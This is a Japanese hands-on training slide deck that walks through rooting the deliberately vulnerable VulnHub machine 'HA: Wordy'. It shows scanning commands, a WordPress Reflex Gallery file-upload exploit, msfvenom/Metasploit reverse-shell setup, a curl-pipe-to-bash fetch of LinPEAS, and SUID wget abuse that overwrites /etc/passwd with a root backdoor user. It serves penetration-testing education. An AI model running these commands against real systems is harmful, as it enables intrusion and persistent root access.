イエラエセキュリティ　ハンズオン勉強会資料

1. © 2021 Ierae Security Inc. All Rights Reserved. 0
© 2021 Ierae Security Inc. All Rights Reserved.
ハンズオン勉強会
2021年8月20日

2. © 2021 Ierae Security Inc. All Rights Reserved. 1
• 講師の紹介
• OSINT PTとVulnHub
• 攻撃者環境の構築
• 本日の攻撃対象
• Walkthrough: Wordy
• チャレンジ問題
• チャレンジ問題 Writeup
AGENDA

3. © 2021 Ierae Security Inc. All Rights Reserved. 2
講師の紹介
講師の紹介

4. © 2021 Ierae Security Inc. All Rights Reserved. 3
講師の紹介
Twitter: @kawakatz

5. © 2021 Ierae Security Inc. All Rights Reserved. 4
OSINT PTとVulnHub
OSINT PTとVulnHub

6. © 2021 Ierae Security Inc. All Rights Reserved. 5
OSINT PTとVulnHub
 管理アセット（ドメイン・ネットワーク）の調査
 サブドメイン探索
 利用SaaSの特定
 ポートスキャン
 各サービスへの調査
 認証情報の探索
 Google検索
 etc...
 Webアプリケーションへの攻撃
 既知の脆弱性の悪用
 認証試行
 0dayの調査
 etc...
 権限昇格
 横展開
 etc...
 エントリーポイント候補の洗い出し
 エントリーポイントへの侵入に向けた情報収集
 フィッシング

7. © 2021 Ierae Security Inc. All Rights Reserved. 6
OSINT PTとVulnHub
 管理アセット（ドメイン・ネットワーク）の調査
 サブドメイン探索
 利用SaaSの特定
 ポートスキャン
 各サービスへの調査
 認証情報の探索
 Google検索
 etc...
 Webアプリケーションへの攻撃
 既知の脆弱性の悪用
 認証試行
 0dayの調査
 etc...
 権限昇格
 横展開
 etc...
 エントリーポイント候補の洗い出し
 エントリーポイントへの侵入に向けた情報収集
 フィッシング

8. © 2021 Ierae Security Inc. All Rights Reserved. 7
攻撃者環境の構築
攻撃者環境の構築

9. © 2021 Ierae Security Inc. All Rights Reserved. 8
攻撃者環境の構築（Kali Linux）
sudo su
passwd
 rootユーザの有効化

10. © 2021 Ierae Security Inc. All Rights Reserved. 9
本日の攻撃対象
本日の攻撃対象

11. © 2021 Ierae Security Inc. All Rights Reserved. 10
本日の攻撃対象
 HA: WORDY
URL：https://www.vulnhub.com/entry/ha-wordy,363/
目標：サーバのroot権限を奪取する

12. © 2021 Ierae Security Inc. All Rights Reserved. 11
本日の攻撃対象
 関連サービス
 Hack The Box (https://www.hackthebox.eu/)
Boxと呼ばれるサーバを攻略しながら、PTの基礎的な攻撃手法を学ぶことができるサービス。
Boxは定期的に入れ替わるため、新しいBoxに挑戦し続けることができる。
Challengeと呼ばれるCTF系の問題も多数存在している。

13. © 2021 Ierae Security Inc. All Rights Reserved. 12
本日の攻撃対象
 関連サービス
 TryHackMe (https://tryhackme.com/)
Hack The Boxと似ているが、テーマごとに分けて学習を進めることができる。

14. © 2021 Ierae Security Inc. All Rights Reserved. 13
本日の攻撃対象
 関連サービス
 OSCP (https://www.offensive-security.com/pwk-oscp/、https://ierae.co.jp/lp/ierae-academy/#course1)
Offensive Security社が提供する実践的なPTの資格。

15. © 2021 Ierae Security Inc. All Rights Reserved. 14
本日の攻撃対象
 関連サービス
 OSCP (https://www.offensive-security.com/pwk-oscp/、https://ierae.co.jp/lp/ierae-academy/#course1)
Offensive Security社が提供する実践的なPTの資格。

16. © 2021 Ierae Security Inc. All Rights Reserved. 15
本日の攻撃対象
 HA: WORDY
URL：https://www.vulnhub.com/entry/ha-wordy,363/
学びたい事
 Nmapを用いたポートスキャン
 Burp Suiteを用いたHTTP通信の確認
 Dirsearchを用いたディレクトリ探索
 WPScanを用いたWordPressに対する調査
 Exploit Codeの理解・悪用
 LinPEASを用いた権限昇格フローの調査
 脆弱性の悪用方法の理解・悪用

17. © 2021 Ierae Security Inc. All Rights Reserved. 16
検証環境の設定
検証環境の設定

18. © 2021 Ierae Security Inc. All Rights Reserved. 17
検証環境の設定
 前提条件
VirtualBoxにKali LinuxとWordyがインポートされていること
 VirtualBoxのNW設定
URL：https://www.vulnhub.com/entry/ha-wordy,363/

19. © 2021 Ierae Security Inc. All Rights Reserved. 18
検証環境の設定
 NATネットワークを用いた仮想マシン間通信の実現
ここでは、VirtualBoxのNATネットワークを用いて、Kali LinuxとWordy間の通信を実現させます。
ファイル > 環境設定 > ネットワーク > ＋マーク
 VirtualBoxのNW設定
URL：https://www.vulnhub.com/entry/ha-wordy,363/

20. © 2021 Ierae Security Inc. All Rights Reserved. 19
検証環境の設定
 NATネットワークを用いた仮想マシン間通信の実現
各仮想マシンのアダプタとして、先ほど作成したネットワークを用いてNATネットワークを指定します。
 VirtualBoxのNW設定
URL：https://www.vulnhub.com/entry/ha-wordy,363/

21. © 2021 Ierae Security Inc. All Rights Reserved. 20
検証環境の設定
 NATネットワークを用いた仮想マシン間通信の実現
2つの仮想マシンを起動します。
Kali Linux側でifconfigコマンドを実行すると、10.0.2.0/24内のIPアドレスが付与されていることが確認できます。
 VirtualBoxのNW設定
URL：https://www.vulnhub.com/entry/ha-wordy,363/

22. © 2021 Ierae Security Inc. All Rights Reserved. 21
検証環境の設定
 ホストオンリーアダプタを用いた仮想マシン間通信の実現
netdiscoverコマンドを用いて、指定したIPレンジ内に存在するホストを列挙します。
netdiscover –r 10.0.2.0/24
※ X.X.X.1のIPアドレスは基本的にホストOSとなります。その他、対象のIPアドレスが1つに絞れない場合、ポート
スキャンの段階まで各IPアドレスに実施していただいて問題ありません。
 VirtualBoxのNW設定
URL：https://www.vulnhub.com/entry/ha-wordy,363/

23. © 2021 Ierae Security Inc. All Rights Reserved. 22
Walkthrough: Wordy
Walkthrough: Wordy

24. © 2021 Ierae Security Inc. All Rights Reserved. 23
Walkthrough: Wordy
目的：外部からアクセス可能なサービスの列挙
 TCPのフルポートスキャン
nmap <IP Address> -p- -sVC –n
-p-: すべてのポートを対象として指定
-sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行
-n: 逆引きDNS解決を行わない
 UDPのTOP1000ポートに対するスキャン
nmap <IP Address> -sUVC –n
-sU: UDPのポートスキャンを実施
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Nmapを用いたポートスキャン

25. © 2021 Ierae Security Inc. All Rights Reserved. 24
Walkthrough: Wordy
目的：外部からアクセス可能なサービスの列挙
 TCPのフルポートスキャン
nmap <IP Address> -p- -sVC –n
-p-: すべてのポートを対象として指定
-sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行
-n: 逆引きDNS解決を行わない
 UDPのTOP1000ポートに対するスキャン
nmap <IP Address> -sUVC –n
-sU: UDPのポートスキャンを実施
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Nmapを用いたポートスキャン

26. © 2021 Ierae Security Inc. All Rights Reserved. 25
Walkthrough: Wordy
目的：外部からアクセス可能なサービスの列挙
 TCPのフルポートスキャン
nmap <IPアドレス> -p- -sVC –n
-p-: すべてのポートを対象として指定
-sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行
-n: 逆引きDNS解決を行わない
 UDPのTOP1000ポートに対するスキャン
nmap <IPアドレス> -sUVC –n
-sU: UDPのポートスキャンを実施
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Nmapを用いたポートスキャン

27. © 2021 Ierae Security Inc. All Rights Reserved. 26
Walkthrough: Wordy
目的：HTTPリクエスト・レスポンスの確認 + 視覚的な調査
Project options > Misc > Embedded Browser > Allow the embedded browser to run without a sandbox.
Proxy > Intercept > Open Browser
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Burp Suiteを用いたHTTP通信の確認

28. © 2021 Ierae Security Inc. All Rights Reserved. 27
Walkthrough: Wordy
目的：HTTPリクエスト・レスポンスの確認 + 視覚的な調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Burp Suiteを用いたHTTP通信の確認

29. © 2021 Ierae Security Inc. All Rights Reserved. 28
Walkthrough: Wordy
目的：HTTPリクエスト・レスポンスの確認 + 視覚的な調査
Proxy > HTTP history
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Burp Suiteを用いたHTTP通信の確認

30. © 2021 Ierae Security Inc. All Rights Reserved. 29
Walkthrough: Wordy
目的：HTTPリクエスト・レスポンスの確認 + 視覚的な調査
 AQUATONE (https://github.com/michenriksen/aquatone)
 EyeWitness (https://github.com/FortyNorthSecurity/EyeWitness)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Burp Suiteを用いたHTTP通信の確認

31. © 2021 Ierae Security Inc. All Rights Reserved. 30
Walkthrough: Wordy
目的：アクセス可能なURLの発見
 Google検索
site:<ドメイン名>
 Wayback Machine (https://web.archive.org/)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Dirsearchを用いたディレクトリ探索

32. © 2021 Ierae Security Inc. All Rights Reserved. 31
Walkthrough: Wordy
目的：アクセス可能なURLの発見
 waybackurls (https://github.com/tomnomnom/waybackurls)
Twitter: @TomNomNom
waybackurls <ドメイン名>
 getallurls (https://github.com/lc/gau)
gau <ドメイン名>
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Dirsearchを用いたディレクトリ探索

33. © 2021 Ierae Security Inc. All Rights Reserved. 32
Walkthrough: Wordy
目的：アクセス可能なURLの発見
 Dirsearch (https://github.com/maurosoria/dirsearch)
apt install dirsearch
dirsearch –u <URL> (-w <Wordlist>)
-w: 使用するワードリストを指定 (https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Dirsearchを用いたディレクトリ探索

34. © 2021 Ierae Security Inc. All Rights Reserved. 33
Walkthrough: Wordy
目的：アクセス可能なURLの発見
 Dirsearch (https://github.com/maurosoria/dirsearch)
apt install dirsearch
dirsearch –u <URL> (-w <Wordlist>)
-w: 使用するワードリストを指定 (https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Dirsearchを用いたディレクトリ探索

35. © 2021 Ierae Security Inc. All Rights Reserved. 34
Walkthrough: Wordy
目的：アクセス可能なURLの発見
 Dirsearchを用いたディレクトリ探索

36. © 2021 Ierae Security Inc. All Rights Reserved. 35
Walkthrough: Wordy
目的：アクセス可能なURLの発見
 Dirsearchを用いたディレクトリ探索

37. © 2021 Ierae Security Inc. All Rights Reserved. 36
Walkthrough: Wordy
目的：アクセス可能なURLの発見
 Wappalyzer (https://www.wappalyzer.com/)
 Dirsearchを用いたディレクトリ探索

38. © 2021 Ierae Security Inc. All Rights Reserved. 37
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
API Tokenがあるとなおよし
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

39. © 2021 Ierae Security Inc. All Rights Reserved. 38
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
http://192.168.43.13/wordpress/?author=1
-> http://192.168.43.13/wordpress/index.php/author/admin/
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

40. © 2021 Ierae Security Inc. All Rights Reserved. 39
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
-eオプションについて
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

41. © 2021 Ierae Security Inc. All Rights Reserved. 40
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
wpscan --url http://<IP Address>/wordpress --enumerate (--api-token <API Token>)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

42. © 2021 Ierae Security Inc. All Rights Reserved. 41
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress --enumerate (--api-token <API Token>)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

43. © 2021 Ierae Security Inc. All Rights Reserved. 42
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress --enumerate (--api-token <API Token>)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

44. © 2021 Ierae Security Inc. All Rights Reserved. 43
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

45. © 2021 Ierae Security Inc. All Rights Reserved. 44
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive)
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

46. © 2021 Ierae Security Inc. All Rights Reserved. 45
Walkthrough: Wordy
目的：WordPress固有の問題の調査
 WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive)
searchsploit reflex gallery
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 WPScanを用いたWordPressに対する調査

47. © 2021 Ierae Security Inc. All Rights Reserved. 46
休憩（5分）
休憩（5分）

48. © 2021 Ierae Security Inc. All Rights Reserved. 47
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
searchsploit -m 36374
cat 36374.txt
 Exploit Codeの理解・悪用

49. © 2021 Ierae Security Inc. All Rights Reserved. 48
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
vim exploit.html
python3 –m http.server 80
echo "<?php phpinfo(); ?>" > phpinfo.php
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

50. © 2021 Ierae Security Inc. All Rights Reserved. 49
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

51. © 2021 Ierae Security Inc. All Rights Reserved. 50
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

52. © 2021 Ierae Security Inc. All Rights Reserved. 51
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

53. © 2021 Ierae Security Inc. All Rights Reserved. 52
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
vim exploit.html
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

54. © 2021 Ierae Security Inc. All Rights Reserved. 53
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード（再チャレンジ）
-> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

55. © 2021 Ierae Security Inc. All Rights Reserved. 54
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード（再チャレンジ）
-> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

56. © 2021 Ierae Security Inc. All Rights Reserved. 55
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード（再チャレンジ）
-> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

57. © 2021 Ierae Security Inc. All Rights Reserved. 56
Walkthrough: Wordy
目的：脆弱性の悪用
 Reverse Shell とは
攻撃対象のサーバから攻撃者のサーバ（C2サーバ）に接続し、遠隔操作を可能にすること
 Exploit Codeの理解・悪用
① 脆弱性を悪用した攻撃
② C2サーバへ接続
③ C2サーバ越しに遠隔操作
C2サーバ 攻撃対象サーバ

58. © 2021 Ierae Security Inc. All Rights Reserved. 57
Walkthrough: Wordy
目的：脆弱性の悪用
 Reverse Shell とは
攻撃対象のサーバから攻撃者のサーバ（C2サーバ）に接続し、遠隔操作を可能にすること
 Exploit Codeの理解・悪用
① 脆弱性を悪用した攻撃
② C2サーバへ接続
③ C2サーバ越しに遠隔操作
C2サーバ 攻撃対象サーバ
Kali Linux Wordy

59. © 2021 Ierae Security Inc. All Rights Reserved. 58
Walkthrough: Wordy
目的：脆弱性の悪用
 Metasploit Framework (https://www.metasploit.com/)
msfvenom –l payload | grep php
msfvenom -p php/reverse_php LHOST=<Kali's IP> LPORT=<Kali's Listen Port> -o shell.php
URL：https://www.vulnhub.com/entry/ha-wordy,363/
 Exploit Codeの理解・悪用

60. © 2021 Ierae Security Inc. All Rights Reserved. 59
Walkthrough: Wordy
目的：脆弱性の悪用
 Metasploit Framework (https://www.metasploit.com/)
msfconsole
 Exploit Codeの理解・悪用

61. © 2021 Ierae Security Inc. All Rights Reserved. 60
Walkthrough: Wordy
目的：脆弱性の悪用
 Metasploit Framework (https://www.metasploit.com/)
msf6 > use multi/handler
msf6 > options
 Exploit Codeの理解・悪用
URL：https://www.vulnhub.com/entry/ha-wordy,363/

62. © 2021 Ierae Security Inc. All Rights Reserved. 61
Walkthrough: Wordy
目的：脆弱性の悪用
 Metasploit Framework (https://www.metasploit.com/)
msf6 exploit(multi/handler) > set payload php/reverse_php
msf6 exploit(multi/handler) > set LHOST <Kali's IP>
msf6 exploit(multi/handler) > set LPORT <Kali's Listen Port>
msf6 exploit(multi/handler) > run
 Exploit Codeの理解・悪用
URL：https://www.vulnhub.com/entry/ha-wordy,363/

63. © 2021 Ierae Security Inc. All Rights Reserved. 62
Walkthrough: Wordy
目的：脆弱性の悪用
 Metasploit Framework (https://www.metasploit.com/)
http://127.0.0.1/exploit.htmlからshell.phpをサーバにアップロード（再チャレンジ）
-> http://<IP Address>/wordpress/wp-content/uploads/2021/08/shell.php
 Exploit Codeの理解・悪用

64. © 2021 Ierae Security Inc. All Rights Reserved. 63
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
 Exploit Codeの理解・悪用

65. © 2021 Ierae Security Inc. All Rights Reserved. 64
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
msfconsole
msf6 > search reflex gallery
 Exploit Codeの理解・悪用
URL：https://www.vulnhub.com/entry/ha-wordy,363/

66. © 2021 Ierae Security Inc. All Rights Reserved. 65
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
msf6 > use 0
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > options
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOST <Wordy's IP>
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST <Kali's IP>
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT <Kali's Listen Port>
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set Proxies http:127.0.0.1
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > advanced
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set ReverseAllowProxy true
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > run
 Exploit Codeの理解・悪用
URL：https://www.vulnhub.com/entry/ha-wordy,363/

67. © 2021 Ierae Security Inc. All Rights Reserved. 66
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
 Exploit Codeの理解・悪用
URL：https://www.vulnhub.com/entry/ha-wordy,363/

68. © 2021 Ierae Security Inc. All Rights Reserved. 67
Walkthrough: Wordy
目的：脆弱性の悪用
 WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
 Exploit Codeの理解・悪用

69. © 2021 Ierae Security Inc. All Rights Reserved. 68
休憩（5分）
休憩（5分）

70. © 2021 Ierae Security Inc. All Rights Reserved. 69
Walkthrough: Wordy
目的：権限昇格フローの発見
 LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
python3 –m http.server 80
 LinPEASを用いた権限昇格フローの調査

71. © 2021 Ierae Security Inc. All Rights Reserved. 70
Walkthrough: Wordy
目的：権限昇格フローの発見
 PTY (pseudo terminal)
「擬似端末（ぎじたんまつ、英語: pseudo terminal）または疑似ターミナルとは、UNIXにおけるテキスト端末の擬似
デバイスのマスター・スレーブのペアである。仮想コンソール、端末装置、シリアルポートハードウェアなどを使用
しないテキスト端末のインターフェイスを提供する。これらのハードウェアの代わりに、擬似端末セッションの役割
をソフトウェア（プロセス）が代用する。例えば、SSHなどでログインするとこの端末に接続される。」
（引用元: https://ja.wikipedia.org/wiki/%E6%93%AC%E4%BC%BC%E7%AB%AF%E6%9C%AB）
-> より扱いやすい + より見やすいTerminal
meterpreter > shell
python3 –c 'import pty; pty.spawn("/bin/bash")'
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

72. © 2021 Ierae Security Inc. All Rights Reserved. 71
Walkthrough: Wordy
目的：権限昇格フローの発見
 LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
curl http://<Kali's IP>/linpeas.sh | bash
wget http://<Kali's IP>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

73. © 2021 Ierae Security Inc. All Rights Reserved. 72
Walkthrough: Wordy
目的：権限昇格フローの発見
 LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
curl http://<Kali's IP>/linpeas.sh | bash
wget http://<Kali's IP>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

74. © 2021 Ierae Security Inc. All Rights Reserved. 73
Walkthrough: Wordy
目的：権限昇格フローの発見
 LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
cat linpeas.sh | bash
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

75. © 2021 Ierae Security Inc. All Rights Reserved. 74
Walkthrough: Wordy
目的：権限昇格フローの発見
 LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
 LinPEASを用いた権限昇格フローの調査

76. © 2021 Ierae Security Inc. All Rights Reserved. 75
Walkthrough: Wordy
目的：権限昇格フローの発見
 GTFOBins (https://gtfobins.github.io/)
 LinPEASを用いた権限昇格フローの調査

77. © 2021 Ierae Security Inc. All Rights Reserved. 76
Walkthrough: Wordy
目的：権限昇格フローの発見
 GTFOBins (https://gtfobins.github.io/)
 LinPEASを用いた権限昇格フローの調査

78. © 2021 Ierae Security Inc. All Rights Reserved. 77
Walkthrough: Wordy
目的：権限昇格フローの発見
 GTFOBins (https://gtfobins.github.io/)
cp wget -> SUID
root権限で書き込み可能
 LinPEASを用いた権限昇格フローの調査

79. © 2021 Ierae Security Inc. All Rights Reserved. 78
Walkthrough: Wordy
目的：権限昇格フローの発見
 GTFOBins (https://gtfobins.github.io/)
cp wget -> SUID
root権限で書き込み可能
 LinPEASを用いた権限昇格フローの調査
/etc/passwdを書き換えよう！

80. © 2021 Ierae Security Inc. All Rights Reserved. 79
Walkthrough: Wordy
目的：権限昇格フローの発見
 /etc/passwdの書き換え
ここでは、backdoorとなる管理者ユーザを追加します。
まず、/etc/passwdからrootユーザの行をpasswdファイルの形式と照らし合わせながら見ていきます。
<UserName>:<Password Hash>:<User ID>:<Group ID>:<Comment>:<Home Directory>:<Login Shell>
root:x:0:0:root:/root:/bin/bash
※ Password Hashに「x」と指定されている場合、ハッシュ値は/etc/shadowファイル内で定義されています。
rootユーザの行をベースにbackdoorとなるユーザの行を作成していきます。
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

81. © 2021 Ierae Security Inc. All Rights Reserved. 80
Walkthrough: Wordy
目的：権限昇格フローの発見
 /etc/passwdの書き換え
ユーザ名とパスワードのハッシュのみを書き換えれば良いため、指定するパスワードハッシュを生成します。
パスワードハッシュは以下の形式になっており、idの値によってハッシュアルゴリズムを特定することができます。
$id$salt$hash
1: MD5
5: SHA256
6: SHA512
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

82. © 2021 Ierae Security Inc. All Rights Reserved. 81
Walkthrough: Wordy
目的：権限昇格フローの発見
 /etc/passwdの書き換え
ユーザ名とパスワードのハッシュのみを書き換えれば良いため、指定するパスワードハッシュを生成します。
パスワードハッシュは以下の形式になっており、idの値によってハッシュアルゴリズムを特定することができます。
$id$salt$hash
1: MD5
5: SHA256
6: SHA512
こうしたパスワードハッシュはopensslコマンドのpasswdサブコマンドを用いて、以下のように生成することができ
ます。
openssl passwd -<id> -salt <Salt> <Password>
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

83. © 2021 Ierae Security Inc. All Rights Reserved. 82
Walkthrough: Wordy
目的：権限昇格フローの発見
 /etc/passwdの書き換え
WordyサーバのpasswdをKaliにコピーし、末尾に1行追記します。
その後、Python製のWebサーバを起動し、改ざんしたpasswdファイルを配送する用意をします。
vim passwd
echo 'ieraebackdoor:$1$ierae$1G/feXS0Di6qME/LP6Zg90:0:0:root:/root:/bin/bash' >> passwd
python3 –m http.server 80
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

84. © 2021 Ierae Security Inc. All Rights Reserved. 83
Walkthrough: Wordy
目的：権限昇格フローの発見
 /etc/passwdの書き換え
wgetのSUIDを悪用してWordyサーバの/etc/passwdを書き換えます。
wget http://<Kali's IP>/passwd –O /etc/passwd
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

85. © 2021 Ierae Security Inc. All Rights Reserved. 84
Walkthrough: Wordy
目的：権限昇格フローの発見
 /etc/passwdの書き換え
/etc/passwdを書き換えたため、suコマンドを用いてbackdoorのユーザにログインし直すことができます。
結果として、root権限を奪取することに成功しました。
su <Backdoor UserName>
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

86. © 2021 Ierae Security Inc. All Rights Reserved. 85
Walkthrough: Wordy
目的：権限昇格フローの発見
 /etc/passwdの書き換え
/etc/passwdを書き換えたため、suコマンドを用いてbackdoorのユーザにログインし直すことができます。
結果として、root権限を奪取することに成功しました。
su <Backdoor UserName>
 LinPEASを用いた権限昇格フローの調査
URL：https://www.vulnhub.com/entry/ha-wordy,363/

87. © 2021 Ierae Security Inc. All Rights Reserved. 86
休憩（5分）
休憩（5分）

88. © 2021 Ierae Security Inc. All Rights Reserved. 87
チャレンジ問題
チャレンジ問題

89. © 2021 Ierae Security Inc. All Rights Reserved. 88
チャレンジ問題
[!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI)
[!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF)
[!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
[!] Title: Mail Masta 1.0 - Multiple SQL Injection
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
